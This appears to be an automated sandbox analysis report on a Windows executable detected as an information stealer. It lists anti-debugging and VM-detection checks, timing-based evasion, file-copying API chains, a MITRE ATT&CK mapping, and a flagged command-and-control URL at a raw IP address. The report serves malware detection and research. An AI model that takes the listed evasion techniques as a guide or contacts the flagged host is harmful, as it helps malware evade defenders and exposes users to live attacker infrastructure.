              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B48F second address: 81B495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B609 second address: 81B630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3874C2D1D6h 0x0000000a popad 0x0000000b jmp 00007F3874C2D1E8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B630 second address: 81B636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BBF4 second address: 81BC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C1C2 second address: 81C1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820902 second address: 82092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E6h 0x00000009 push ecx 0x0000000a jmp 00007F3874C2D1DAh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82092D second address: 82094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82094B second address: 82096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3874C2D1E8h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824E74 second address: 824E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02DD second address: 4DA02E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02E3 second address: 4DA0336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F38751214ADh 0x00000013 sub ecx, 622C9FE6h 0x00000019 jmp 00007F38751214B1h 0x0000001e popfd 0x0000001f jmp 00007F38751214B0h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0336 second address: 4DA0348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3874C2D1DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0348 second address: 4DA0393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, 32DAh 0x00000011 pushfd 0x00000012 jmp 00007F38751214ABh 0x00000017 sbb ecx, 1306607Eh 0x0000001d jmp 00007F38751214B9h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0393 second address: 4DA0399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0401 second address: 4DA042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F38751214B3h 0x0000000a jmp 00007F38751214B3h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA042E second address: 4DA0490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 call 00007F3874C2D1DBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov dx, 2AE6h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 jmp 00007F3874C2D1E3h 0x0000001c jmp 00007F3874C2D1E8h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F3874C2D1E0h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0490 second address: 4DA0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0494 second address: 4DA0498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0498 second address: 4DA049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 741E90 second address: 741E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 58D0DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 75CCAB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 58F9FF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7B96E3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-27159)
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003518A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00353910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00353910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035E210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00351269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00351250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00354B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00354B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003523A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00352390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00352390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035CBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0035DD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0035D530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003416B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003416A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00361BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00361BF0
Source: file.exe, file.exe, 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1425810310.0000000001008000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1425810310.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1425810310.000000000100C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW?
Source: file.exe, 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25963)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25816)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25972)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-25835)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00344A60 VirtualProtect 00000000,00000004,00000100,? 0_2_00344A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00366390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00366390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00366390 mov eax, dword ptr fs:[00000030h] 0_2_00366390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00362A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00362A40
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7644, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00364610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00364610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_003646A0
Source: file.exe, file.exe, 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: \Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00362D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00361B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00361B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00362A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00362A40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00362C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00362C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7644, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7644, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (a number before a technique name is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.php7S | 100% | Avira URL Cloud | malware
